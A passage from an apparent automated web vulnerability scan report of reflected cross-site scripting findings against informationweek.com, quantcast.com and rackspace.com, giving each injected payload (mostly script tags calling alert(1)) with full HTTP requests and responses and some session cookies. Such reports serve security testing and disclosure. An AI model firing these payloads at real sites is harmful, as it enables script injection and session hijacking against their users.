X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
function shMoreRes() {
   if (!loading_results) {
       loading_results = true;
       $.ajaxSetup ({
           cache: false
       });
       
       now_showing += 15;
       cur_page++;
       
       showMLoading();
       
       $.get('show_more.php', 'f0e8d</script><script>alert(1)</script>164da3fbd1b=1&cp=ringtones&&page=' + cur_page + '&sd=' + get_sd, function(data){
           $('#mr').append(data);
           hideMLoading();
           updateNow();
           loading_results = false;
       });
   }
}

$('#sh').click(function() {
   s
...[SNIP]...

4.117. http://www.informationweek.com/news/software/hosted/showArticle.jhtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/software/hosted/showArticle.jhtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f2f"><script>alert(1)</script>42a734dfe42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsd4f2f"><script>alert(1)</script>42a734dfe42/software/hosted/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=SOVVIITHY30MLQE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32887


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/newsd4f2f"><script>alert(1)</script>42a734dfe42/software/h;kvarticleid=;kvauthor=;loc=300;grp=285504902" target="_blank">
...[SNIP]...

4.118. http://www.informationweek.com/news/software/hosted/showArticle.jhtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/software/hosted/showArticle.jhtml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf881'-alert(1)-'c7d0e430718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsbf881'-alert(1)-'c7d0e430718/software/hosted/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:43 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:43 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=E5L45LDGRZA11QE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32837


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/newsbf881'-alert(1)-'c7d0e430718/software/hosted/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=945734015;misc='+new Date().getTime()+'">
...[SNIP]...

4.119. http://www.informationweek.com/news/software/hosted/showArticle.jhtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/software/hosted/showArticle.jhtml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6465'-alert(1)-'291f947bd70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/softwaref6465'-alert(1)-'291f947bd70/hosted/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=RD2TG501O4YWPQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32358


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/softwaref6465'-alert(1)-'291f947bd70/hosted/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=389734246;misc='+new Date().getTime()+'">
...[SNIP]...

4.120. http://www.informationweek.com/news/software/hosted/showArticle.jhtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/software/hosted/showArticle.jhtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab8a"><script>alert(1)</script>b614631af52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/softwaredab8a"><script>alert(1)</script>b614631af52/hosted/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=J03AGR31Q5PQNQE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32408


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/softwaredab8a"><script>alert(1)</script>b614631af52/h;kvarticleid=;kvauthor=;loc=300;grp=731813626" target="_blank">
...[SNIP]...

4.121. http://www.informationweek.com/news/software/hosted/showArticle.jhtml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/software/hosted/showArticle.jhtml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dc63'-alert(1)-'4490bf86c41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/software/hosted5dc63'-alert(1)-'4490bf86c41/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=VBUYZEOB41MHPQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32813


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/news/software/hosted5dc63'-alert(1)-'4490bf86c41/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=173128278;misc='+new Date().getTime()+'">
...[SNIP]...

4.122. http://www.informationweek.com/news/software/hosted/showArticle.jhtml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.informationweek.com
Path:   /news/software/hosted/showArticle.jhtml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0b8"><a%20b%3dc>325da676732 was submitted in the REST URL parameter 3. This input was echoed as cc0b8"><a b=c>325da676732 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/software/hostedcc0b8"><a%20b%3dc>325da676732/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:47 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:47 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=4DWIFQDDRQC2LQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32815


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/news/software/hostedcc0b8"><a b=c>325da676732/showArticle;kvarticleid=;kvauthor=;loc=300;grp=695609622" target="_blank">
...[SNIP]...

4.123. http://www.informationweek.com/news/software/hosted/showArticle.jhtml [articleID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/software/hosted/showArticle.jhtml

Issue detail

The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6576"><script>alert(1)</script>cebc826cf51 was submitted in the articleID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/software/hosted/showArticle.jhtml?articleID=225700573b6576"><script>alert(1)</script>cebc826cf51&subSection=Hosted+Software HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:52 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:52 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=AO4VIN1V3MUUNQE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 34103


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<link rel="canonical" href="http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576"><script>alert(1)</script>cebc826cf51"/>
...[SNIP]...

4.124. http://www.informationweek.com/news/software/hosted/showArticle.jhtml [articleID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/software/hosted/showArticle.jhtml

Issue detail

The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fbfd'%3balert(1)//94414a05705 was submitted in the articleID parameter. This input was echoed as 6fbfd';alert(1)//94414a05705 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/software/hosted/showArticle.jhtml?articleID=2257005736fbfd'%3balert(1)//94414a05705&subSection=Hosted+Software HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:53 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:53 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=WB0PTHRLAGQ1PQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33678


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=2257005736fbfd';alert(1)//94414a05705+/news/software/hosted/showArticle/dhandler;kvarticleid=2257005736fbfd';alert(1)//94414a05705;kvauthor=;loc=100;target=_blank;grp=919541144;misc='+new Date().getTime()+'">
...[SNIP]...

4.125. http://www.quantcast.com/p-c0xFC9HiPwWw- [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-c0xFC9HiPwWw-

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1a16<a>c35b1c1308c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-c0xFC9HiPwWw-f1a16<a>c35b1c1308c HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 05 Feb 2011 16:11:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> p-c0xFC9HiPwWw-f1a16<a>c35b1c1308c</em>
...[SNIP]...

4.126. http://www.quantcast.com/p-c0xFC9HiPwWw- [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-c0xFC9HiPwWw-

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70e07"><a>827f9aea977 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-c0xFC9HiPwWw-70e07"><a>827f9aea977 HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 05 Feb 2011 16:11:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" p-c0xFC9HiPwWw-70e07"><a>827f9aea977" />
...[SNIP]...

4.127. http://www.rackspace.com/blog/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /blog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df87"><script>alert(1)</script>8c3dc7536d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3df87\"><script>alert(1)</script>8c3dc7536d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/?3df87"><script>alert(1)</script>8c3dc7536d=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:33:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.rackspace.com/blog/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: keyword=cleanentry; expires=Sat, 05-Feb-2011 16:33:58 GMT; path=/; domain=.rackspace.com
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; expires=Sat, 05-Feb-2011 16:33:58 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 107436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
age-chatinvite-wrap"
               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/blog/?3df87\"><script>alert(1)</script>8c3dc7536d=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;">
...[SNIP]...

4.128. http://www.rackspace.com/blogs/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /blogs/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32034"><script>alert(1)</script>0aa11522d95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/index.php?32034"><script>alert(1)</script>0aa11522d95=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:46:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=3; expires=Sat, 05-Feb-2011 16:46:47 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
vite-wrap"
               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/blogs/index.php?32034"><script>alert(1)</script>0aa11522d95=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal
...[SNIP]...

4.129. http://www.rackspace.com/forms/contactsales.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /forms/contactsales.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26f"><script>alert(1)</script>18575b301b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forms/contactsales.php?7a26f"><script>alert(1)</script>18575b301b2=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:27:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: keyword=cleanentry; expires=Sat, 05-Feb-2011 16:27:56 GMT; path=/; domain=.rackspace.com
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; expires=Sat, 05-Feb-2011 16:27:56 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 36544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
ap"
